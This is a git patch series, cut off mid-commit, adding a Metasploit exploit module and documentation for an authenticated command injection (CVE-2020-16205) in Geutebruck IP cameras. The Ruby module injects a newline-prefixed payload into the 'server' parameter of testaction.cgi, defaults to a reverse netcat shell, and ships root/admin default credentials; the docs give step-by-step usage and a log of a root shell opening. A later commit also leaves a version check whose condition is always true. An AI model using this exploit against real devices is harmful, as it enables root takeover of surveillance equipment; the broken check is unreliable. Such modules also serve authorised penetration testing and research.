From a5e25f5a42b3c787ad94655d74c9e5af621a771b Mon Sep 17 00:00:00 2001 From: ddouhine Date: Tue, 11 Aug 2020 18:17:32 +0200 Subject: [PATCH 01/20] Add exploit for Geutebruck G-CAM --- .../linux/http/geutebruck_testaction_exec.rb | 84 +++++++++++++++++++ 1 file changed, 84 insertions(+) create mode 100644 modules/exploits/linux/http/geutebruck_testaction_exec.rb diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb new file mode 100644 index 0000000000..8be68ca00b --- /dev/null +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -0,0 +1,84 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + + +class MetasploitModule < Msf::Exploit::Remote + Rank = NormalRanking + include Msf::Exploit::Remote::HttpClient + include Msf::Exploit::CmdStager + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Geutebruck testaction.cgi Remote Command Execution', + 'Description' => %q{ + This module exploits a an arbitrary command execution vulnerability. The + vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an + authenticated user to execute arbitrary commands with root privileges. + with web user privileges. Firmware <= 1.12.14.5 are concerned. + Tested on 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware. + }, + 'Author' => + [ + 'Davy Douhine' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2020-16205' ], + [ 'URL', 'http://geutebruck.com' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ] + ], + 'DisclosureDate' => 'May 20 2020', + 'Privileged' => true, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_ARMLE], + 'Targets' => [ + [ 'Automatic Target', { } ] + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => + { + 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' + } + )) + + register_options( + [ + OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]), + OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]), + OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']), + ], self.class) + end + + def check + begin + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/brand.xml', + 'query' => "", + ) + if res && (res.body.include?("1.12.0.25") || res.body.include?("1.12.13.2") || res.body.include?("1.12.14.5")) + return CheckCode::Vulnerable + end + rescue ::Rex::ConnectionError + return CheckCode::Unknown + end + CheckCode::Safe + end + + def exploit + user = datastore['HttpUsername'] + pass = datastore['HttpPassword'] + header = "type=ntp&server=%0a" + uri = target_uri.path + "?" + "#{header}" + Rex::Text.uri_encode(payload.encoded, "hex-all") + print_status("#{rhost}:#{rport} - Attempting to exploit...") + res = send_request_raw( + { + 'method' => 'GET', + 'uri' => uri + }) + end + +end From a14a2fe8d21c16de9dd78e931beee669419b936c Mon Sep 17 00:00:00 2001 From: ddouhine Date: Tue, 11 Aug 2020 19:43:50 +0200 Subject: [PATCH 02/20] Add documentation for Geutebruck G-CAM exploit --- .../linux/http/geutebruck_testaction_exec.md | 68 +++++++++++++++++++ 1 file changed, 68 insertions(+) create mode 100644 documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md diff --git a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md new file mode 100644 index 0000000000..242bbc9f79 --- /dev/null +++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md @@ -0,0 +1,68 @@ +## Vulnerable Application + +[Geutebruck](https://www.geutebrueck.com) Encoder and E2 Series Camera models: +G-Code: + EEC-2xxx +G-Cam: + EBC-21xx + EFD-22xx + ETHC-22xx + EWPC-22xx + +### Description + +This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products. +Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03 +Tested it with the 1.12.14.5 firmware only. + +## Verification Steps + +List the steps needed to make sure this thing works + + 1. Do: `use exploit/linux/http/geutebruck_testaction_exec` + 2. Do: `set httpusername root` + 3. Do: `set httppassword admin` + 4. Do: `set lhost 192.168.14.1` + 5. Do: `set rhosts 192.168.14.58` + 6. Do: `set payload cmd/unix/reverse_netcat_gaping` + 7. Do: `check` + 8. Do: `exploit` + +## Options + + ### HTTPUSERNAME + + A username used to authenticate on the admin page. **Default: root** + + ### HTTPPASSWORD + +The password of the username used to authenticate on the admin page. **Default: admin** + +## Scenarios + +``` +msf5 > use exploit/linux/http/geutebruck_testaction_exec +msf5 exploit(linux/http/geutebruck_testaction_exec) > +msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping +payload => cmd/unix/reverse_netcat_gaping +msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root +httpusername => root +msf5 exploit(linux/http/geutebruck_testaction_exec) > set httppassword admin +httppassword => admin +msf5 exploit(linux/http/geutebruck_testaction_exec) > set lhost 192.168.14.1 +lhost => 192.168.14.1 +msf5 exploit(linux/http/geutebruck_testaction_exec) > set rhosts 192.168.14.58 +rhosts => 192.168.14.58 +msf5 exploit(linux/http/geutebruck_testaction_exec) > exploit + +[*] Started reverse TCP handler on 192.168.14.1:4444 +[*] 192.168.14.58:80 - Attempting to exploit... +[*] Command shell session 3 opened (192.168.14.1:4444 -> 192.168.14.58:43392) at 2020-04-02 18:26:28 +0200 +pwd + +/tmp/www_ramdisk/uapi-cgi/admin +id +uid=0(root) gid=0(root) +uname -a +Linux EFD-2250 2.6.18_IPNX_PRODUCT_1.1.2-ge52275bd #1 PREEMPT Thu Jul 25 20:25:39 KST 2019 armv5tejl GNU/Linux +``` From e4f760691ed5f04a5394bcf2dc7f7e44f8d61bef Mon Sep 17 00:00:00 2001 From: ddouhine Date: Thu, 13 Aug 2020 16:02:18 +0200 Subject: [PATCH 03/20] Update geutebruck_testaction_exec.md it should be better now :) --- .../linux/http/geutebruck_testaction_exec.md | 40 +++++++++++++------ 1 file changed, 28 insertions(+), 12 deletions(-) diff --git a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md index 242bbc9f79..936310d279 100644 --- a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md +++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md @@ -1,6 +1,7 @@ ## Vulnerable Application -[Geutebruck](https://www.geutebrueck.com) Encoder and E2 Series Camera models: +The web interface of the following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5 "limited versions" are concerned: +Encoder and E2 Series Camera models: G-Code: EEC-2xxx G-Cam: @@ -9,33 +10,48 @@ G-Cam: ETHC-22xx EWPC-22xx +Many brands use the same firmware: +UDP Technology (which is also the supplier of the firmware for the other vendors) +Ganz +Visualint +Cap +THRIVE Intelligence +Sophus +VCA +TripCorps +Sprinx Technologies +Smartec +Riva + +This module has been tested on a Geutebruck 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware. + ### Description This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products. Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03 -Tested it with the 1.12.14.5 firmware only. ## Verification Steps -List the steps needed to make sure this thing works - - 1. Do: `use exploit/linux/http/geutebruck_testaction_exec` - 2. Do: `set httpusername root` - 3. Do: `set httppassword admin` - 4. Do: `set lhost 192.168.14.1` - 5. Do: `set rhosts 192.168.14.58` + 1. Start the camera using default configuration + 2. Launch msfconsole + 3. Do: `use exploit/linux/http/geutebruck_testaction_exec` + 4. Do: `set httpusername root` + 5. Do: `set httppassword admin` + 6. Do: `set lhost ` + 5. Do: `set rhosts ` 6. Do: `set payload cmd/unix/reverse_netcat_gaping` - 7. Do: `check` + 7. Do: `check` to be sure the target is vulnerable 8. Do: `exploit` + 9. You should get a shell ## Options - ### HTTPUSERNAME +The default credentials to log on the web interface are root/admin. + ### HTTPUSERNAME A username used to authenticate on the admin page. **Default: root** ### HTTPPASSWORD - The password of the username used to authenticate on the admin page. **Default: admin** ## Scenarios From 42a2a77a7ea45f7dd00ef36a0eae732d3d6ce64a Mon Sep 17 00:00:00 2001 From: ddouhine Date: Thu, 13 Aug 2020 16:13:46 +0200 Subject: [PATCH 04/20] Update geutebruck_testaction_exec.md or now... (forgot the msftidy_docs just before) --- .../exploit/linux/http/geutebruck_testaction_exec.md | 8 ++++---- 1 file changed, 4 insertions(+), 4 deletions(-) diff --git a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md index 936310d279..a4960686f0 100644 --- a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md +++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md @@ -1,10 +1,10 @@ ## Vulnerable Application -The web interface of the following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5 "limited versions" are concerned: +The following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5: Encoder and E2 Series Camera models: -G-Code: +G-Code: EEC-2xxx -G-Cam: +G-Cam: EBC-21xx EFD-22xx ETHC-22xx @@ -27,7 +27,7 @@ This module has been tested on a Geutebruck 5.02024 G-Cam/EFD-2250 running 1.12. ### Description -This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface of the Geutebruck G-Cam and G-Code products. +This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface. Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03 ## Verification Steps From 4ceb542fac3f094cd9658a70272a93f71109c771 Mon Sep 17 00:00:00 2001 From: ddouhine Date: Thu, 13 Aug 2020 16:18:10 +0200 Subject: [PATCH 05/20] Update modules/exploits/linux/http/geutebruck_testaction_exec.rb Co-authored-by: bcoles --- .../exploits/linux/http/geutebruck_testaction_exec.rb | 9 ++++----- 1 file changed, 4 insertions(+), 5 deletions(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index 8be68ca00b..3faec27959 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -71,13 +71,12 @@ class MetasploitModule < Msf::Exploit::Remote def exploit user = datastore['HttpUsername'] pass = datastore['HttpPassword'] - header = "type=ntp&server=%0a" - uri = target_uri.path + "?" + "#{header}" + Rex::Text.uri_encode(payload.encoded, "hex-all") print_status("#{rhost}:#{rport} - Attempting to exploit...") - res = send_request_raw( + res = send_request_cgi( { - 'method' => 'GET', - 'uri' => uri + 'method' => 'GET', + 'uri' => target_uri.path, + 'vars_get' => { 'type' => 'ntp', 'server' => "\n#{payload.encoded}" } }) end From a69d941a72a24609bfefdb89d3498940c6c24610 Mon Sep 17 00:00:00 2001 From: ddouhine Date: Thu, 13 Aug 2020 16:18:28 +0200 Subject: [PATCH 06/20] Update modules/exploits/linux/http/geutebruck_testaction_exec.rb Co-authored-by: bcoles --- modules/exploits/linux/http/geutebruck_testaction_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index 3faec27959..c52dd9bcfc 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -49,7 +49,7 @@ class MetasploitModule < Msf::Exploit::Remote OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]), OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]), OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']), - ], self.class) + ]) end def check From 5f6a0746a6f0dbdc49f785a74fd577180413a78a Mon Sep 17 00:00:00 2001 From: ddouhine Date: Thu, 13 Aug 2020 16:19:19 +0200 Subject: [PATCH 07/20] Update modules/exploits/linux/http/geutebruck_testaction_exec.rb Co-authored-by: bcoles --- modules/exploits/linux/http/geutebruck_testaction_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index c52dd9bcfc..556b08a5f2 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -13,7 +13,7 @@ class MetasploitModule < Msf::Exploit::Remote super(update_info(info, 'Name' => 'Geutebruck testaction.cgi Remote Command Execution', 'Description' => %q{ - This module exploits a an arbitrary command execution vulnerability. The + This module exploits an arbitrary command execution vulnerability. The vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an authenticated user to execute arbitrary commands with root privileges. with web user privileges. Firmware <= 1.12.14.5 are concerned. From 959689d5dea6e27a51e0491645ebfbf5ffba2340 Mon Sep 17 00:00:00 2001 From: ddouhine Date: Thu, 13 Aug 2020 16:24:45 +0200 Subject: [PATCH 08/20] Update geutebruck_testaction_exec.rb Fixed rubocop offenses / msftidy warnings and added @bcoles enhancements. --- .../linux/http/geutebruck_testaction_exec.rb | 112 +++++++++--------- 1 file changed, 57 insertions(+), 55 deletions(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index 556b08a5f2..a1642f9efa 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -1,83 +1,85 @@ ## -# This module requires Metasploit: http://metasploit.com/download +# This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## - class MetasploitModule < Msf::Exploit::Remote - Rank = NormalRanking + Rank = GoodRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager - + def initialize(info = {}) - super(update_info(info, - 'Name' => 'Geutebruck testaction.cgi Remote Command Execution', - 'Description' => %q{ - This module exploits an arbitrary command execution vulnerability. The - vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an - authenticated user to execute arbitrary commands with root privileges. - with web user privileges. Firmware <= 1.12.14.5 are concerned. - Tested on 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware. - }, - 'Author' => - [ - 'Davy Douhine' + super( + update_info( + info, + 'Name' => 'Geutebruck testaction.cgi Remote Command Execution', + 'Description' => %q{ + This module exploits an arbitrary command execution vulnerability. The + vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an + authenticated user to execute arbitrary commands with root privileges. + Firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5 "limited versions" are concerned. + Tested on 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware. + }, + 'Author' => + [ + 'Davy Douhine' + ], + 'License' => MSF_LICENSE, + 'References' => + [ + [ 'CVE', '2020-16205' ], + [ 'URL', 'http://geutebruck.com' ], + [ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ], + [ 'URL', 'https://www.randorisec.fr/s05e01-rce-on-geutebruck-ip-cameras/' ] + ], + 'DisclosureDate' => 'May 20 2020', + 'Privileged' => true, + 'Platform' => ['unix', 'linux'], + 'Arch' => [ARCH_ARMLE], + 'Targets' => [ + [ 'Automatic Target', {} ] ], - 'License' => MSF_LICENSE, - 'References' => - [ - [ 'CVE', '2020-16205' ], - [ 'URL', 'http://geutebruck.com' ], - [ 'URL', 'https://ics-cert.us-cert.gov/advisories/icsa-20-219-03' ] - ], - 'DisclosureDate' => 'May 20 2020', - 'Privileged' => true, - 'Platform' => ['unix', 'linux'], - 'Arch' => [ARCH_ARMLE], - 'Targets' => [ - [ 'Automatic Target', { } ] - ], - 'DefaultTarget' => 0, - 'DefaultOptions' => - { - 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' - } - )) + 'DefaultTarget' => 0, + 'DefaultOptions' => + { + 'PAYLOAD' => 'cmd/unix/reverse_netcat_gaping' + } + ) + ) register_options( [ OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'root' ]), OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]), OptString.new('TARGETURI', [true, 'The path to the testaction page', '/uapi-cgi/admin/testaction.cgi']), - ]) + ] + ) end def check - begin - res = send_request_cgi( - 'method' => 'GET', - 'uri' => '/brand.xml', - 'query' => "", - ) - if res && (res.body.include?("1.12.0.25") || res.body.include?("1.12.13.2") || res.body.include?("1.12.14.5")) - return CheckCode::Vulnerable - end - rescue ::Rex::ConnectionError - return CheckCode::Unknown + begin + res = send_request_cgi( + 'method' => 'GET', + 'uri' => '/brand.xml' + ) + if res && (res.body.include?('1.12.0.25') || res.body.include?('1.12.13.2') || res.body.include?('1.12.14.5')) + return CheckCode::Vulnerable end - CheckCode::Safe + rescue ::Rex::ConnectionError + return CheckCode::Unknown end + CheckCode::Safe + end def exploit - user = datastore['HttpUsername'] - pass = datastore['HttpPassword'] print_status("#{rhost}:#{rport} - Attempting to exploit...") - res = send_request_cgi( + send_request_cgi( { - 'method' => 'GET', - 'uri' => target_uri.path, + 'method' => 'GET', + 'uri' => target_uri.path, 'vars_get' => { 'type' => 'ntp', 'server' => "\n#{payload.encoded}" } - }) + } + ) end end From 3c70f37dbe8321fa5805005f2428a2a7ace1da7b Mon Sep 17 00:00:00 2001 From: gwillcox-r7 Date: Thu, 13 Aug 2020 14:40:33 -0500 Subject: [PATCH 09/20] Update exploit ranking to reflect the fact that this is a CMD Injection vulnerability with no chance of crashing the host --- modules/exploits/linux/http/geutebruck_testaction_exec.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index a1642f9efa..e53923e0d5 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -4,7 +4,7 @@ ## class MetasploitModule < Msf::Exploit::Remote - Rank = GoodRanking + Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient include Msf::Exploit::CmdStager From dc21773f1083bed696a6dbf191ddb8352ee67b0a Mon Sep 17 00:00:00 2001 From: gwillcox-r7 Date: Thu, 13 Aug 2020 15:13:55 -0500 Subject: [PATCH 10/20] Apply updates to make the English a bit neater r.e affected versions. Also applied updates to make the markdown have bullet points so it displays better. Finally modified up the module description to explain the actual issue a bit more, but it might still need work --- .../linux/http/geutebruck_testaction_exec.md | 54 ++++++++++--------- 1 file changed, 30 insertions(+), 24 deletions(-) diff --git a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md index a4960686f0..59b189e30a 100644 --- a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md +++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md @@ -1,34 +1,41 @@ ## Vulnerable Application -The following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5: -Encoder and E2 Series Camera models: -G-Code: - EEC-2xxx -G-Cam: - EBC-21xx - EFD-22xx - ETHC-22xx - EWPC-22xx +The following [Geutebruck](https://www.geutebrueck.com) products using firmware versions <= 1.12.0.25, +firmware version 1.12.13.2 or firmware version 1.12.14.5: +* Encoder and E2 Series Camera models: + * G-Code: + * EEC-2xxx + * G-Cam: + * EBC-21xx + * EFD-22xx + * ETHC-22xx + * EWPC-22xx Many brands use the same firmware: -UDP Technology (which is also the supplier of the firmware for the other vendors) -Ganz -Visualint -Cap -THRIVE Intelligence -Sophus -VCA -TripCorps -Sprinx Technologies -Smartec -Riva + * UDP Technology (which is also the supplier of the firmware for the other vendors) + * Ganz + * Visualint + * Cap + * THRIVE Intelligence + * Sophus + * VCA + * TripCorps + * Sprinx Technologies + * Smartec + * Riva -This module has been tested on a Geutebruck 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware. +This module has been tested on a Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5. ### Description -This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface. -Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03 +This module exploits an authenticated OS command injection vulnerability (CVE-2020-16205) within the +`server` GET parameter of /uapi-cgi/admin/testaction.cgi when the `type` parameter is set to `ntp`. +This issue occurs due to a lack of validation on the `server` parameter, which allows an attacker to +inject a new line character, followed by the command they wish to execute, at which point the server will +then interpret the new string as a separate command to be executed. Successful exploitation will result in +remote code execution as the `root` user. + +Users can find additional details of this vulnerability on the advisory page at https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03. ## Verification Steps @@ -58,7 +65,6 @@ The password of the username used to authenticate on the admin page. **Default: ``` msf5 > use exploit/linux/http/geutebruck_testaction_exec -msf5 exploit(linux/http/geutebruck_testaction_exec) > msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping payload => cmd/unix/reverse_netcat_gaping msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root From c59b3835f9860bee0cbe4dbefa601106f31594c2 Mon Sep 17 00:00:00 2001 From: gwillcox-r7 Date: Thu, 13 Aug 2020 15:18:10 -0500 Subject: [PATCH 11/20] Fix up module description to have better sentence structure and English and to also include the actual versions of the products that were affected in addition to the firmware versions. This prevents people from having to read the documentation to find affected targets --- .../linux/http/geutebruck_testaction_exec.rb | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index e53923e0d5..6037275fa4 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -14,15 +14,15 @@ class MetasploitModule < Msf::Exploit::Remote info, 'Name' => 'Geutebruck testaction.cgi Remote Command Execution', 'Description' => %q{ - This module exploits an arbitrary command execution vulnerability. The - vulnerability exists in the /uapi-cgi/testaction.cgi page and allows an - authenticated user to execute arbitrary commands with root privileges. - Firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5 "limited versions" are concerned. - Tested on 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware. + This module exploits an authenticated arbitrary command execution vulnerability within the + /uapi-cgi/testaction.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, + ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.25 as well as firmware + versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as + the root user. }, 'Author' => [ - 'Davy Douhine' + 'Davy Douhine' # ddouhine ], 'License' => MSF_LICENSE, 'References' => From 0dc53c46d4d3b2dcae9946f0851cbbe165d208fa Mon Sep 17 00:00:00 2001 From: gwillcox-r7 Date: Thu, 13 Aug 2020 15:23:09 -0500 Subject: [PATCH 12/20] Apply Rubocop fixes I forgot about and update the module description to add in missing information about affected parameters --- .../exploits/linux/http/geutebruck_testaction_exec.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index 6037275fa4..a39c7e207f 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -14,11 +14,11 @@ class MetasploitModule < Msf::Exploit::Remote info, 'Name' => 'Geutebruck testaction.cgi Remote Command Execution', 'Description' => %q{ - This module exploits an authenticated arbitrary command execution vulnerability within the - /uapi-cgi/testaction.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, - ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.25 as well as firmware - versions 1.12.13.2 and 1.12.14.5. Successful exploitation results in remote code execution as - the root user. + This module exploits an authenticated arbitrary command execution vulnerability within the 'server' + GET parameter of the /uapi-cgi/testaction.cgi page of Geutebruck G-Cam EEC-2xxx and G-Code EBC-21xx, EFD-22xx, + ETHC-22xx, and EWPC-22xx devices running firmware versions <= 1.12.0.25 as well as firmware + versions 1.12.13.2 and 1.12.14.5 when the 'type' GET paramter is set to 'ntp'. + Successful exploitation results in remote code execution as the root user. }, 'Author' => [ From 5e7c821d6db71b368d01a24dc74bc6369b4a0fd2 Mon Sep 17 00:00:00 2001 From: ddouhine Date: Fri, 14 Aug 2020 23:15:12 +0200 Subject: [PATCH 13/20] Update geutebruck_testaction_exec.md --- .../modules/exploit/linux/http/geutebruck_testaction_exec.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md index 59b189e30a..ab009e1823 100644 --- a/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md +++ b/documentation/modules/exploit/linux/http/geutebruck_testaction_exec.md @@ -62,7 +62,7 @@ The default credentials to log on the web interface are root/admin. The password of the username used to authenticate on the admin page. **Default: admin** ## Scenarios - +### Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5. ``` msf5 > use exploit/linux/http/geutebruck_testaction_exec msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping From f726967ba7dd7c824337025dae0b1b88dd62d99e Mon Sep 17 00:00:00 2001 From: ddouhine Date: Fri, 14 Aug 2020 23:17:26 +0200 Subject: [PATCH 14/20] Update geutebruck_testaction_exec.rb with the updated check using `Gem::Version` --- .../linux/http/geutebruck_testaction_exec.rb | 26 +++++++++++++++---- 1 file changed, 21 insertions(+), 5 deletions(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index a39c7e207f..e5df31d39b 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -20,6 +20,7 @@ class MetasploitModule < Msf::Exploit::Remote versions 1.12.13.2 and 1.12.14.5 when the 'type' GET paramter is set to 'ntp'. Successful exploitation results in remote code execution as the root user. }, + 'Author' => [ 'Davy Douhine' # ddouhine @@ -56,18 +57,33 @@ class MetasploitModule < Msf::Exploit::Remote ) end - def check + def firmware begin res = send_request_cgi( 'method' => 'GET', 'uri' => '/brand.xml' ) - if res && (res.body.include?('1.12.0.25') || res.body.include?('1.12.13.2') || res.body.include?('1.12.14.5')) - return CheckCode::Vulnerable + unless res + vprint_error 'Connection failed' + return CheckCode::Unknown end - rescue ::Rex::ConnectionError - return CheckCode::Unknown + + res_xml = res.get_xml_document + @version = res_xml.at('//firmware').text + return true end + end + + def check + firmware + version = Gem::Version.new(@version) + vprint_status "Found Geutebruck version #{version}" + if version < Gem::Version.new('1.12.0.25') || + version == Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5') + + return CheckCode::Appears + end + CheckCode::Safe end From f3fdcf43436cbd89086f7a0ee932412c41a9ad35 Mon Sep 17 00:00:00 2001 From: ddouhine Date: Fri, 14 Aug 2020 23:56:21 +0200 Subject: [PATCH 15/20] Update geutebruck_testaction_exec.rb Oops sorry, don't know what this "return true" was doing there. --- modules/exploits/linux/http/geutebruck_testaction_exec.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index e5df31d39b..c49211453a 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -70,7 +70,6 @@ class MetasploitModule < Msf::Exploit::Remote res_xml = res.get_xml_document @version = res_xml.at('//firmware').text - return true end end From 898f94320c5a694f33195f139d28a0409d52d041 Mon Sep 17 00:00:00 2001 From: gwillcox-r7 Date: Fri, 14 Aug 2020 17:18:31 -0500 Subject: [PATCH 16/20] Add in fixes to check method so that the code will return the correct status if the connection fails --- .../exploits/linux/http/geutebruck_testaction_exec.rb | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/modules/exploits/linux/http/geutebruck_testaction_exec.rb b/modules/exploits/linux/http/geutebruck_testaction_exec.rb index c49211453a..a268d10af6 100644 --- a/modules/exploits/linux/http/geutebruck_testaction_exec.rb +++ b/modules/exploits/linux/http/geutebruck_testaction_exec.rb @@ -70,16 +70,17 @@ class MetasploitModule < Msf::Exploit::Remote res_xml = res.get_xml_document @version = res_xml.at('//firmware').text + return true end end def check - firmware + result = firmware + return result unless result.true? + version = Gem::Version.new(@version) vprint_status "Found Geutebruck version #{version}" - if version < Gem::Version.new('1.12.0.25') || - version == Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5') - + if version < Gem::Version.new('1.12.0.25') || Gem::Version.new('1.12.13.2') || version == Gem::Version.new('1.12.14.5') return CheckCode::Appears end @@ -96,5 +97,4 @@ class MetasploitModule < Msf::Exploit::Remote } ) end - end From 896c8aacae9e2d252ee6aad017f630a4adc204e8 Mon Sep 17 00:00:00 2001 From: gwillcox-r7 Date: Fri, 14 Aug 2020 17:27:39 -0500 Subject: [PATCH 17/20] Add in AutoCheck mixin so that we ensure targets 